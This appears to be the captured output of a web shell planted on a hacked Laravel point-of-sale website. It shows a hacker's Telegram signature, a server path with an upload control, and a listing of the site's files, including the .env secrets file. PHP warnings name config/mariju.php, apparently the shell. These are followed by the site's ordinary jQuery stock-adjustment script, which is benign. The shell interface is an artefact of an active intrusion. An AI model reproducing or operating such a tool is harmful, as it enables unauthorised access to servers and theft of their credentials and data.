telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log12089144 KBJuly 18 2025 12:57:340644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
$(document).ready(function() { //Add products if ($('#search_product_for_srock_adjustment').length > 0) { //Add Product $('#search_product_for_srock_adjustment') .autocomplete({ source: function(request, response) { $.getJSON( '/products/list', { location_id: $('#location_id').val(), term: request.term }, response ); }, minLength: 2, response: function(event, ui) { if (ui.content.length == 1) { ui.item = ui.content[0]; if (ui.item.qty_available > 0 && ui.item.enable_stock == 1) { $(this) .data('ui-autocomplete') ._trigger('select', 'autocompleteselect', ui); $(this).autocomplete('close'); } } else if (ui.content.length == 0) { swal(LANG.no_products_found); } }, focus: function(event, ui) { if (ui.item.qty_available <= 0) { return false; } }, select: function(event, ui) { if (ui.item.qty_available > 0) { $(this).val(null); stock_adjustment_product_row(ui.item.variation_id); } else { alert(LANG.out_of_stock); } }, }) .autocomplete('instance')._renderItem = function(ul, item) { if (item.qty_available <= 0) { var string = '
  • ' + item.name; if (item.type == 'variable') { string += '-' + item.variation; } string += ' (' + item.sub_sku + ') (Out of stock)
  • '; return $(string).appendTo(ul); } else if (item.enable_stock != 1) { return ul; } else { var string = '
    ' + item.name; if (item.type == 'variable') { string += '-' + item.variation; } string += ' (' + item.sub_sku + ')
    '; return $('
  • ') .append(string) .appendTo(ul); } }; } $('select#location_id').change(function() { if ($(this).val()) { $('#search_product_for_srock_adjustment').removeAttr('disabled'); } else { $('#search_product_for_srock_adjustment').attr('disabled', 'disabled'); } $('table#stock_adjustment_product_table tbody').html(''); $('#product_row_index').val(0); update_table_total(); }); $(document).on('change', 'input.product_quantity', function() { update_table_row($(this).closest('tr')); }); $(document).on('change', 'input.product_unit_price', function() { update_table_row($(this).closest('tr')); }); $(document).on('click', '.remove_product_row', function() { swal({ title: LANG.sure, icon: 'warning', buttons: true, dangerMode: true, }).then(willDelete => { if (willDelete) { $(this) .closest('tr') .remove(); update_table_total(); } }); }); //Date picker $('#transaction_date').datetimepicker({ format: moment_date_format + ' ' + moment_time_format, ignoreReadonly: true, }); $('form#stock_adjustment_form').validate(); stock_adjustment_table = $('#stock_adjustment_table').DataTable({ processing: true, serverSide: true, fixedHeader:false, ajax: '/stock-adjustments', columnDefs: [ { targets: 0, orderable: false, searchable: false, }, ], aaSorting: [[1, 'desc']], columns: [ { data: 'action', name: 'action' }, { data: 'transaction_date', name: 'transaction_date' }, { data: 'ref_no', name: 'ref_no' }, { data: 'location_name', name: 'BL.name' }, { data: 'adjustment_type', name: 'adjustment_type' }, { data: 'final_total', name: 'final_total' }, { data: 'total_amount_recovered', name: 'total_amount_recovered' }, { data: 'additional_notes', name: 'additional_notes' }, { data: 'added_by', name: 'u.first_name' }, ], fnDrawCallback: function(oSettings) { __currency_convert_recursively($('#stock_adjustment_table')); }, }); var detailRows = []; $(document).on('click', 'button.delete_stock_adjustment', function() { swal({ title: LANG.sure, icon: 'warning', buttons: true, dangerMode: true, }).then(willDelete => { if (willDelete) { var href = $(this).data('href'); $.ajax({ method: 'DELETE', url: href, dataType: 'json', success: function(result) { if (result.success) { toastr.success(result.msg); stock_adjustment_table.ajax.reload(); } else { toastr.error(result.msg); } }, }); } }); }); }); function stock_adjustment_product_row(variation_id) { var row_index = parseInt($('#product_row_index').val()); var location_id = $('select#location_id').val(); $.ajax({ method: 'POST', url: '/stock-adjustments/get_product_row', data: { row_index: row_index, variation_id: variation_id, location_id: location_id }, dataType: 'html', success: function(result) { $('table#stock_adjustment_product_table tbody').append(result); update_table_total(); $('#product_row_index').val(row_index + 1); }, }); } function update_table_total() { var table_total = 0; $('table#stock_adjustment_product_table tbody tr').each(function() { var this_total = parseFloat(__read_number($(this).find('input.product_line_total'))); if (this_total) { table_total += this_total; } }); $('input#total_amount').val(table_total); $('span#total_adjustment').text(__number_f(table_total)); } function update_table_row(tr) { var quantity = parseFloat(__read_number(tr.find('input.product_quantity'))); var unit_price = parseFloat(__read_number(tr.find('input.product_unit_price'))); var row_total = 0; if (quantity && unit_price) { row_total = quantity * unit_price; } tr.find('input.product_line_total').val(__number_f(row_total)); update_table_total(); } $(document).on('shown.bs.modal', '.view_modal', function() { __currency_convert_recursively($('.view_modal')); });